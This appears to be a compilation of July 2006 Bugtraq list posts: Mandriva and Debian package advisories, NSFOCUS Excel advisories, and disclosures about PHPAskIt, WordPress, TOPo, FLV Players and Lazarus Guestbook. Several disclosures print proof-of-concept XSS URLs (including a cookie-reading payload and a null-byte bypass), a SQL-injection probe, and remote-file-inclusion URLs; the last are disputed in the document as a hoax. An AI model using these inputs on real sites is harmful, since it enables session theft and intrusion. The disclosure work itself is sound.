Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.
This vulnerability does not exist. Even with register_globals on, $dir and $qadir are overridden by a static variable within the script itself.
[ MDKSA-2006:121 ] - Updated xine-lib packages fix buffer overflow vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:121 http://www.mandriva.com/security/ ___ Package : xine-lib Date: July 12, 2006 Affected: 2006.0, Corporate 3.0 ___ Problem Description: Stack-based buffer overflow in MiMMS 0.0.9 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via the (1) send_command, (2) string_utf16, (3) get_data, and (4) get_media_packet functions, and possibly other functions. Xine-lib contains an embedded copy of the same vulnerable code. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2200 ___ Updated Packages: Mandriva Linux 2006.0: 34c23d8a858d2a2687297e25618c7b04 2006.0/RPMS/libxine1-1.1.0-9.6.20060mdk.i586.rpm 57f9a069b8fc968a12ce24605390c1f1 2006.0/RPMS/libxine1-devel-1.1.0-9.6.20060mdk.i586.rpm 7c2652ce586d087793536649d7da6966 2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.i586.rpm 37eff9bda8595acfbaf80e0998db1c9e 2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.i586.rpm e5672e6558978051f6878dea6ba961b5 2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.i586.rpm 6527706516fb99a53f82d2c8c4b2e5f8 2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.i586.rpm 10d172825fdd5dd2dd92dfafd5d60e23 2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.i586.rpm 87b9a38b877b67f0ac0ee4f58ed50983 2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.i586.rpm 8656ea92b3fca51e2fad861ea963b14d 2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.i586.rpm 6a538ee35d785dfc7ea64a03c20060da 2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.i586.rpm 9defa64950f2feebab9dda16d35523cb 2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.i586.rpm d207307cb338b46edd703797b693ea24 2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.i586.rpm 4dc1623162c6092eb10c755ed2c5366a 2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 8798915891b79ac134565f8ede0653b1 x86_64/2006.0/RPMS/lib64xine1-1.1.0-9.6.20060mdk.x86_64.rpm dcd2eb828f921b04206124835eeada8e x86_64/2006.0/RPMS/lib64xine1-devel-1.1.0-9.6.20060mdk.x86_64.rpm a933644c1c56d642a5d576cb217d0356 x86_64/2006.0/RPMS/xine-aa-1.1.0-9.6.20060mdk.x86_64.rpm 238d8526e618dff3aa31e223c14ce432 x86_64/2006.0/RPMS/xine-arts-1.1.0-9.6.20060mdk.x86_64.rpm d9f0269ae701936ce27b6515e5c73ac1 x86_64/2006.0/RPMS/xine-dxr3-1.1.0-9.6.20060mdk.x86_64.rpm 4683507048ec6535c2c5f63997ec719d x86_64/2006.0/RPMS/xine-esd-1.1.0-9.6.20060mdk.x86_64.rpm bc649ad82f11c8422f1e9fb711dd4803 x86_64/2006.0/RPMS/xine-flac-1.1.0-9.6.20060mdk.x86_64.rpm 52fe1d4ddeeea6ec91a776ccacf5df19 x86_64/2006.0/RPMS/xine-gnomevfs-1.1.0-9.6.20060mdk.x86_64.rpm 348cc9ecf59e378b3d1c6aa12a35f9b9 x86_64/2006.0/RPMS/xine-image-1.1.0-9.6.20060mdk.x86_64.rpm d2f2300e0bd4e4e210bbfae485c07624 x86_64/2006.0/RPMS/xine-plugins-1.1.0-9.6.20060mdk.x86_64.rpm afca19bc708fc5964c19fff3a2d16286 x86_64/2006.0/RPMS/xine-polyp-1.1.0-9.6.20060mdk.x86_64.rpm ba7c60488a4459066ba4ed08046ce48c x86_64/2006.0/RPMS/xine-smb-1.1.0-9.6.20060mdk.x86_64.rpm 4dc1623162c6092eb10c755ed2c5366a x86_64/2006.0/SRPMS/xine-lib-1.1.0-9.6.20060mdk.src.rpm Corporate 3.0: 1390c15ca893041af1076e6a02d14f47 corporate/3.0/RPMS/libxine1-1-0.rc3.6.12.C30mdk.i586.rpm ecc53b859629edd48ef27b477332889e corporate/3.0/RPMS/libxine1-devel-1-0.rc3.6.12.C30mdk.i586.rpm a4d85795d05266793fa61ba6bc986aa6 corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.i586.rpm 4dd4249d6b1911501ddcfa1ef36470af corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.i586.rpm c9a3f82dad17f32a6ab6c0b1926c52c1 corporate/3.0/RPMS/xine-dxr3-1-0.rc3.6.12.C30mdk.i586.rpm c40b65dd7cde826b8bfa5fb5720d15ed corporate/3.0/RPMS/xine-esd-1-0.rc3.6.12.C30mdk.i586.rpm 2a257f092fe4b304be7e358230aa0361 corporate/3.0/RPMS/xine-flac-1-0.rc3.6.12.C30mdk.i586.rpm b04b482c8693272f7ead71ac3ce91e7f corporate/3.0/RPMS/xine-gnomevfs-1-0.rc3.6.12.C30mdk.i586.rpm ae63549d198004056aacacee5b2ccbef corporate/3.0/RPMS/xine-plugins-1-0.rc3.6.12.C30mdk.i586.rpm d8fe8f9dff1190413e81e82e67762462 corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.12.C30mdk.src.rpm Corporate 3.0/X86_64: aad2ac9345e05d900910b8beade5ff21 x86_64/corporate/3.0/RPMS/lib64xine1-1-0.rc3.6.12.C30mdk.x86_64.rpm b9540819f0250a2924297ce0388f6202 x86_64/corporate/3.0/RPMS/lib64xine1-devel-1-0.rc3.6.12.C30mdk.x86_64.rpm 53cc9dc911be64bf8764d76262df4a44 x86_64/corporate/3.0/RPMS/xine-aa-1-0.rc3.6.12.C30mdk.x86_64.rpm 280b7a7ceb168225d30eb97e95f45fb6 x86_64/corporate/3.0/RPMS/xine-arts-1-0.rc3.6.12.C30mdk.x86_64.rpm 4e3811096df50e37e6b10f
FLV Players Multiple Input Validation Vulnerabilities
Produce : FLV Players 8 Website : http://www.videospark.com [+] Fullpath Disclosure : 1) http://localhost/flv8/paginate.php Fatal error: Class simplepagemaker: Cannot inherit from undefined class object in /var/www/zero/httpdocs/flv8/paginate.php on line 45 2) http://localhost/flv8/player.php?p=somthing atal error: SimplePageMaker::make() - out of bounds in page chihaja in /var/www/zero/httpdocs/flv8/paginate.php on line 131 [+] Multiple Cross Site Scripting PoC : http://localhost/flv8/player.php?url=[XSS] http://localhost/flv8/popup.php?url=%3C/title%3E[XSS] http://localhost/flv8/popup.php?url=%22%3E%3C[XSS] Mourad Contact : [EMAIL PROTECTED] Moroccan Security Research Team
NSFOCUS SA2006-05 : Microsoft Excel SELECTION Record Memory Corruption Vulnerability
NSFOCUS Security Advisory (SA2006-05) Microsoft Excel SELECTION Record Memory Corruption Vulnerability Release Date: 2006-07-12 CVE ID: CVE-2006-1302 http://www.nsfocus.com/english/homepage/research/0605.htm Affected systems & software === Microsoft Excel 2000 Microsoft Excel 2002 Microsoft Excel 2003 Unaffected systems & software === Summary = NSFocus Security Team discovered a memory corruption vulnerability in Microsoft Excel's processing of SELECTION record, which allows remote attackers to run arbitrary via carefully crafted Excel files. Description Excel does not perform sufficient check for certain field when processing SELECTION record. During some data copying operation the user-supplied data might be used for the copying, resulting in memory corruption and arbitrary code execution. Attackers can craft an Excel file with malformed SELECTION record and allure users to open it via instant messaging tools, e-mail or other vectors, resulting in arbitrary code execution with the privilege of the user. If the user is the administrator, then attackers might take complete control over the system. Workaround = Do not open any Excel file from untrusted sources. Vendor Status == 2006.03.30 Informed the vendor 2006.04.03 Vendor confirmed the vulnerability 2006.07.11 Microsoft has released a security bulletin (MS06-037) and related patches. For more details about the security bulletin, please refer to: http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx Additional Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-1302 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. Acknowledgment === Wen Yujie of NSFocus Security Team found the vulnerability. DISCLAIMS == THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team <[EMAIL PROTECTED]> NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com) PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
Re: # MHG Security Team --- PHPAskIt v2.0.1 Remote File Inc.
Hi there, I would like to point out that the security vulnerability quoted below (and seen here: http://archives.neohapsis.com/archives/bugtraq/2006-06/0234.html - submitted to bugtraq on June 12, 2006) concerning the CodeGrrl.com script, PHPAskIt, is incorrect. I am the author of this script and can confidently say that no such hack can take place through the convertaa.php and convertwakqa.php files. This has been fully tested by myself and others when we became aware of the supposed vulnerability. The reason why a file inclusion cannot take place through the query string is because $qadir and $dir are defined within the script. Even with register_globals on, any instance of these variables declared as part of the query string (convertaa.php?qadir=[url to malicious script], for example) will be overwritten with the version in the script. The files work as such: convertaa.php: $qadir = "/home/user/public_html/somefolder/"; // Ask&Answer installation path (WITH trailing slash) if (file_exists($qadir . "config.php")) { //checking for config.php in this folder and including it if it exists include($qadir . "config.php"); } else { //if it doesn't exist die("Error: Ask&Answer's config.php could not be found. Please make sure this file exists in the directory you have specified and try again."); } //database conversion happens here ?> convertwakqa.php: $dir = "/home/user/public_html/somefolder/"; //replace with absolute path to your Wak's A&A directory (WITH SLASH AT THE END!) if (file_exists($dir . "functions.php")) { //checking for a functions.php file in above directory and including it if it exists include($dir . "functions.php"); } else { die("Error: Wak's Ask&Answer's functions.php could not be found. Please make sure this file exists in your Wak's Ask&Answer directory."); } if (file_exists("../config.php")) { //checking for config.php in parent folder and including if exists include("../config.php"); } else { die("Error: Could not find PHPAskIt's config.php. Without this file, the script cannot operate. Please makes sure it exists."); } //database conversion ?> As you can see, $dir and $qadir are defined and cannot be overwritten by additional variables in the GET array, or query string. Furthermore, PHPAskIt 2.0+ will not run if any of the import files are left in place. Please could you notify readers of any sites that may list this vulnerability that it is a hoax. CodeGrrl.com has recently come under fire for similar vulnerabilities in older scripts, and, being that PHPAskIt was released AFTER those were discovered, it was imperative that this sort of thing was avoided. Quite frankly I find it insulting that somebody has decided that I would be capable of leaving such a large security hole in my script when it was written a good three years after most of CodeGrrl.com's previous scripts, which contained a multiple file inclusion vulnerability in their password protection file, protection.php. I would never have left such an obvious hole in my own script. It is our (CodeGrrl.com's) belief that people are spreading rumours about our newer scripts in an effort to further tarnish the site's reputation. However, PHPAskIt is NOT VULNERABLE TO REMOTE FILE INCLUSION. Thank you for clearing this up on your site(s), Amelie CodeGrrl.com Staff - Original Message # # /\/\!|_|_! |-|4|23|<47 # # # Milli-Harekat Advisory ( www.milli-harekat.org ) # PHPAskIt <== v2.0.1 - Remote File Include Vulnerabilities # Risk : High # Class: Remote # Script : PHPAskIt v2.0.1 # Credits : ERNE erne[at]ernealizm[dot]com # Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,LiZ0zim,EntRýk4,Korsan.Di_lejyoner and All MHG USERS # Vulnerable : http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir=[evil_scripts] http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir=[evil_scripts]
Re: WordPress 2.0.3 SQL Error and Full Path Disclosure
Isn't this actually an SQL Injection rather than information leakage? Try : http://localhost/wordpress/index.php?paged=%27 I mean, the error message (this time in English) is: WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1] It specifically says that "You have an error in your SQL syntax", which means my input goes into the query... -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Sunday, July 02, 2006 12:15 To: bugtraq@securityfocus.com Subject: WordPress 2.0.3 SQL Error and Full Path Disclosure WordPress 2.0.3 SQL Error and Full Path Disclosure Discovered By zero [Moroccan Security Team] Software: WordPress 2.0.3 Site : www.wordpress.org ~ SQL Error ~ Example: http://localhost/wordpress/index.php?paged=-1 Result: WordPress database error: [Erreur de syntaxe pr?s de '-20, 10' ? la ligne 1] SELECT DISTINCT * FROM wp_posts WHERE 1=1 AND post_date_gmt <= '2006-06-29 12:46:59' AND (post_status = "publish") AND post_status != "attachment" GROUP BY wp_posts.ID ORDER BY post_date DESC LIMIT -20, 10 ~ Full path ~ /wp-settings.php /wp-admin/admin-footer.php /wp-admin/admin-functions.php /wp-admin/edit-form.php /wp-admin/edit-form-advanced.php /wp-admin/edit-form-comment.php /wp-admin/edit-link-form.php /wp-admin/edit-page-form.php /wp-admin/menu.php /wp-admin/menu-header.php /wp-admin/upgrade-functions.php /wp-admin/upgrade-schema.php /wp-admin/import/blogger.php /wp-admin/import/dotclear.php /wp-admin/import/livejournal.php /wp-admin/import/mt.php /wp-admin/import/rss.php /wp-admin/import/textpattern.php /wp-content/plugins/hello.php /wp-content/plugins/wp-db-backup.php /wp-content/plugins/akismet/akismet.php /wp-content/themes/classic/index.php /wp-content/themes/classic/comments.php /wp-content/themes/classic/comments- popup.php /wp-content/themes/classic/footer.php /wp-content/themes/classic/header.php /wp-content/themes/classic/sidebar.php /wp-content/themes/default/index.php /wp-content/themes/default/404.php /wp-content/themes/default/archive.php /wp-content/themes/default/archives.php /wp-content/themes/default/attachment.php /wp-content/themes/default/comments-popup.php /wp-content/themes/default/footer.php /wp-content/themes/default/functions.php /wp-content/themes/default/header.php /wp-content/themes/default/links.php /wp-content/themes/default/page.php /wp-content/themes/default/search.php /wp-content/themes/default/searchform.php /wp-content/themes/default/sidebar.php /wp-content/themes/default/single.php /wp-includes/default-filters.php /wp-includes/kses.php /wp-includes/locale.php /wp-includes/rss-functions.php /wp-includes/template-loader.php /wp-includes/vars.php /wp-includes/wp-db.php Greetz: simo64, tahati, net_ghost, dabdoub, simo dreaminfo, iss4m, zerosecure, hunter, themenotor ... Contact: Author: Mourad [ zero ] Email : xzerox(at)linuxmail(dot)org
New CVE number states Excel Style handling as a separate issue
New CVE document http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431 published recently confirms the information that Microsoft Excel Style handling vulnerability aka Nanika.xls issue is a separate vulnerability. This vulnerability mentioned affects only to Simplified Chinese, Traditional Chinese, Japanese and Korean versions of Excel. This vulnerability (let's say 4th Excel vulnerability) uses Repair Mode too and user interaction is needed. This information has been updated to my First Microsoft Excel 0-day Vulnerability FAQ document at SecuriTeam Blogs. If fix to this vulnerability is included to monthly July updates from Microsoft it's expected that this CVE-2006-3431 is listed in the upcoming security bulletin to clarify the situation. So-called 1st Excel code execution vulnerability reported in June is http://www.microsoft.com/technet/security/advisory/921365.mspx and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3059 - Juha-Matti
NSFOCUS SA2006-06 : Microsoft Excel COLINFO Record Buffer Overflow Vulnerability
NSFOCUS Security Advisory (SA2006-06) Microsoft Excel COLINFO Record Buffer Overflow Vulnerability Release Date: 2006-07-12 CVE ID: CVE-2006-1304 http://www.nsfocus.com/english/homepage/research/0606.htm Affected systems & software === Microsoft Excel 2000 Microsoft Excel 2002 Microsoft Excel 2003 Unaffected systems & software === Summary = NSFocus Security Team discovered a buffer overflow vulnerability in Microsoft Excel's processing of COLINFO record, which allows remote attackers to run arbitrary via carefully crafted Excel files. Description Excel does not perform sufficient check for certain field when processing COLINFO record, which might cause a buffer overflow vulnerability in data filling operation. Attackers can run arbitrary via carefully craft data. Attackers can craft an Excel file with malformed COLINFO record and allure users to open it via instant messaging tools, e-mail or other vectors, resulting in arbitrary code execution with the privilege of the user. If the user is the administrator, then attackers might take complete control over the system. Workaround = Do not open any Excel file from untrusted sources. Vendor Status == 2006.03.30 Informed the vendor 2006.04.03 Vendor confirmed the vulnerability 2006.07.11 Microsoft has released a security bulletin (MS06-037) and related patches. For more details about the security bulletin, please refer to: http://www.microsoft.com/technet/security/bulletin/MS06-037.mspx Additional Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-1304 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. Candidates may change significantly before they become official CVE entries. Acknowledgment === Wen Yujie of NSFocus Security Team found the vulnerability. DISCLAIMS == THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY. Copyright 1999-2006 NSFOCUS. All Rights Reserved. Terms of use. NSFOCUS Security Team <[EMAIL PROTECTED]> NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com) PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA
[ MDKSA-2006:120 ] - Updated samba packages fix DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:120 http://www.mandriva.com/security/ ___ Package : samba Date: July 10, 2006 Affected: 10.2, 2006.0, Corporate 3.0 ___ Problem Description: A vulnerability in samba 3.0.x was discovered where an attacker could cause a single smbd process to bloat, exhausting memory on the system. This bug is caused by continually increasing the size of an array which maintains state information about the number of active share connections. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3403 http://www.samba.org/samba/security/CAN-2006-3403.html ___ Updated Packages: Mandriva Linux 10.2: 3eb4f4fe83862cc464bec94f345b1205 10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm 20257c42dc31bfa2c7528e7033485aeb 10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm 4abbb93b864aec424b863085e4cd17fe 10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm 54c14b19aeda54fb096766938dcd7ba0 10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.i586.rpm 6a718136f97f343c1673e9e82aa6685c 10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.i586.rpm e0f0ca5db168dbec2ee78c47b04d4dfe 10.2/RPMS/samba-client-3.0.13-2.1.102mdk.i586.rpm aca4da8c53f090b9e41bd95690d95a27 10.2/RPMS/samba-common-3.0.13-2.1.102mdk.i586.rpm 80c6725741baa3386e8d15a552a2e5aa 10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.i586.rpm ef137687ddad3bee055d6d3870e74db8 10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.i586.rpm 226357f0e98fa1c3b8abe17a23d1f715 10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.i586.rpm 80a8107ea3f020bc930ecde070aefb61 10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.i586.rpm e2d6e9fa08e770f08171d75dd1079d5a 10.2/RPMS/samba-server-3.0.13-2.1.102mdk.i586.rpm 62043615a61aa9424cee64634f6f8d95 10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.i586.rpm b76512984b8268a6c1d6474dd623c405 10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.i586.rpm 21f24f6b6d4ba6ebdaf259c9ad2ff894 10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.i586.rpm 268ecfc08e5cd02ec69b2c3df9a79e3c 10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.i586.rpm 469c6f7ac18bb3f3e963b15d6ddb218b 10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.i586.rpm 3cfae3f4e389c05b161fc03447fe8ea1 10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 1cabdda84ee642347b89b39f9b20647f x86_64/10.2/RPMS/lib64smbclient0-3.0.13-2.1.102mdk.x86_64.rpm ac3ed439d87acb15e3c2e29c43a6c15c x86_64/10.2/RPMS/lib64smbclient0-devel-3.0.13-2.1.102mdk.x86_64.rpm 62220c9ea9b521ae9255351f9d2e9a72 x86_64/10.2/RPMS/lib64smbclient0-static-devel-3.0.13-2.1.102mdk.x86_64.rpm 3eb4f4fe83862cc464bec94f345b1205 x86_64/10.2/RPMS/libsmbclient0-3.0.13-2.1.102mdk.i586.rpm 20257c42dc31bfa2c7528e7033485aeb x86_64/10.2/RPMS/libsmbclient0-devel-3.0.13-2.1.102mdk.i586.rpm 4abbb93b864aec424b863085e4cd17fe x86_64/10.2/RPMS/libsmbclient0-static-devel-3.0.13-2.1.102mdk.i586.rpm e3ee798596a4c1a3986046100967082d x86_64/10.2/RPMS/mount-cifs-3.0.13-2.1.102mdk.x86_64.rpm f7cc4e909f28d48b265c11be4ea910d7 x86_64/10.2/RPMS/nss_wins-3.0.13-2.1.102mdk.x86_64.rpm 4740a0c21ac308c552611a5ee347c72a x86_64/10.2/RPMS/samba-client-3.0.13-2.1.102mdk.x86_64.rpm 6115c746181eaeb5c0d1d507c116a6db x86_64/10.2/RPMS/samba-common-3.0.13-2.1.102mdk.x86_64.rpm ff054b178cff6c783fc730ca9c6ada5f x86_64/10.2/RPMS/samba-doc-3.0.13-2.1.102mdk.x86_64.rpm c6e65bf57165bdc7f438e92ec9bd7823 x86_64/10.2/RPMS/samba-passdb-mysql-3.0.13-2.1.102mdk.x86_64.rpm abf978ba0e1a53d0bc7c9938787d57f5 x86_64/10.2/RPMS/samba-passdb-pgsql-3.0.13-2.1.102mdk.x86_64.rpm 8d3dcc5cfd15c7401bd0c1835b2ede77 x86_64/10.2/RPMS/samba-passdb-xml-3.0.13-2.1.102mdk.x86_64.rpm 47c818ab47d1a18e3fe2bdc44d7c3916 x86_64/10.2/RPMS/samba-server-3.0.13-2.1.102mdk.x86_64.rpm 0d64c5d745416788db5c1e879f04ae03 x86_64/10.2/RPMS/samba-smbldap-tools-3.0.13-2.1.102mdk.x86_64.rpm fb96a98a1ec0fa08001e0ecb155bb243 x86_64/10.2/RPMS/samba-swat-3.0.13-2.1.102mdk.x86_64.rpm 06d7c44374d9ba8cde7077da3d6908c7 x86_64/10.2/RPMS/samba-vscan-clamav-3.0.13-2.1.102mdk.x86_64.rpm d7349d986a8b2b602c2c74d405571c27 x86_64/10.2/RPMS/samba-vscan-icap-3.0.13-2.1.102mdk.x86_64.rpm a7b8792e6ee53529f84dbb2c42431396 x86_64/10.2/RPMS/samba-winbind-3.0.13-2.1.102mdk.x86_64.rpm 3cfae3f4e389c05b161fc03447fe8ea1 x86_64/10.2/SRPMS/samba-3.0.13-2.1.102mdk.src.rpm Mandriva Linux 2006.0: b639e531c8aa76a45bb4fd7fc0c9d08f 2006.0/RPMS/libsmbclient0-3.0.20-3.1.20060mdk.i586.rpm 21d7c1bcdae8ba923815557a265aed8c 2006.0/RPMS/libsm
Lazarus Guestbook Cross Site Scripting Vulnerabilities
Produce : Lazarus Guestbook Website : http://carbonize.co.uk/Lazarus/ Version : <= 1.6 Problem : Cross Site Scripting 1) The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised This can be exploited to execute arbitrary HTML and javascript code Vulnerable code in lang/codes-english.php near line 4 1 2 3 4 Exploit : http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS] http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3Ealert(document.cookie); 2) the seconde probleme is in picture.php , the script verifiy fist if image file exists after it display it , vulnerable code : in picture.php 24 if (!empty($_GET['img'])) { 26 if (file_exists("$GB_TMP/$_GET[img]")) { 27 $size = @GetImageSize("$GB_TMP/$_GET[img]"); 28 $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]"; 29 } .. 49 50 \n"; 53} 54?> 55 if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 ) POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code] file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed Exploit: http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS] http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3Ealert(document.cookie); Contact : simo64[at]gmail[dot]com Moroccan Security Research Team
RE: Old vulnerable sotwares collection
Older versions of various freely distributable programs can be found at OldVersion.com (http://www.oldversion.com/). -- John Rigali Information Technology Coordinator Verbum Dei High School http://www.verbumdeihs.com/ Working in the Jesuit Tradition -Original Message- From: Jerome Athias [mailto:[EMAIL PROTECTED] Sent: Monday, July 10, 2006 12:40 AM To: bugtraq@securityfocus.com Subject: Old vulnerable sotwares collection Hi, it's often difficult to find old versions of vulnerable softwares it's usefull to have these old versions to test an exploit, study a vulnerability or doing a patch analysis... it's also usefull to test a fuzzer, a scanner... for a course or a challenge... so i think about to build a little reposiroty with old versions of little softwares (free or trial) if interested or could help, please visit this page: https://www.securinfos.info/old_softwares_vulnerable.php Cheers /JA
Re: Browser bugs hit IE, Firefox today (SANS)
On 7/4/06, Thor Larholm <[EMAIL PROTECTED]> wrote: However, reading the contentDocument property of the DOM element instead of the through the frames collection will give you a reference to the document object inside the thirdparty domain and even allow you to overwrite native DOM methods without throwing a security exception, such as document.getElementById("thirdparty").contentDocument.getElementById=function(s){alert(s)}. This code throws an exception in Firefox 1.5.0.4: "Error: uncaught exception: Permission denied to set property HTMLDocument.getElementById " Just obtaining a reference to the contentDocument works, but any action on it throws an error.
S21Sec-032-en: Vulnerability in Fatwire Content Server
## - S21Sec Advisory - ## Title: FatWire Content Server ID: S21SEC-032-en Severity: High - Administrative Privileges Escalation History: 31.May.2006 Vulnerability discovered 05.Jun.2006 Fixed (patch available) Scope: FatWire Content Server Portal Platforms: Any Author: Alberto Moro ([EMAIL PROTECTED]) URL: http://www.s21sec.com/avisos/s21sec-032-en.txt Release: Public [ SUMMARY ] The FatWire Content Server product suite enables companies to deploy a wide variety and large quantity of Web sites and content-centric applications that build customer loyalty, reach new markets, strengthen brand identity, boost productivity, and reduce costs. [ AFFECTED VERSIONS ] Following tested versions are affected with this issue: - FatWire Content Server 5.5.0 [ DESCRIPTION ] It's possible to obtain administrative privileges in the portal without previous registration or validation. [ WORKAROUND ] Upgrade FatWire CS to the last version or apply the patch provided by vendor. [ ACKNOWLEDGMENTS ] These vulnerabilities have been found and researched by: - Alberto Moro <[EMAIL PROTECTED]> S21Sec With thanks to: - Leonardo Nve <[EMAIL PROTECTED]> S21Sec [ REFERENCES ] * FatWire Content Server http://www.fatwire.com/cs/Satellite/CSPage_US.html * S21Sec http://www.s21sec.com
TOPo v.2.2.178 Account Reset
TOPo v.2.2.178 Account Reset Author: Attila Gerendi (Darkz) Date: July 12, 2006 Package: TOPo (http://ej3soft.ej3.net/) Versions Affected: 2.2.178 (Other versions may also be affected.) Severity: Password Reset Description: It is possible to overide an existing entry posting a new entry with a previous entry ID. The ID can be extracted from the main window links ex: http://[host]/[path]/index.php?m=top&s=out&ID=1152699749.6695 The new entry will overide the original entry, also this will overide the original password. Another problem is the ID formath xx. where is the original (initial) password. Solution: TOPo development seen to be suspended by now. No new release from January 5 2005.
[SECURITY] [DSA 1108-1] New mutt packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1108-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff Jul 11th, 2006 http://www.debian.org/security/faq - -- Package: mutt Vulnerability : buffer overflow Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-3242 Debian Bug : 375828 It was discovered that the mutt mail reader performs insufficient validation of values returned from an IMAP server, which might overflow a buffer and potentially lead to the injection of arbitrary code. For the stable distribution (sarge) this problem has been fixed in version 1.5.9-2sarge2. For the unstable distribution (sid) this problem has been fixed in version 1.5.11+cvs20060403-2. We recommend that you upgrade your mutt package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/m/mutt/mutt_1.5.9-2sarge2.dsc Size/MD5 checksum: 775 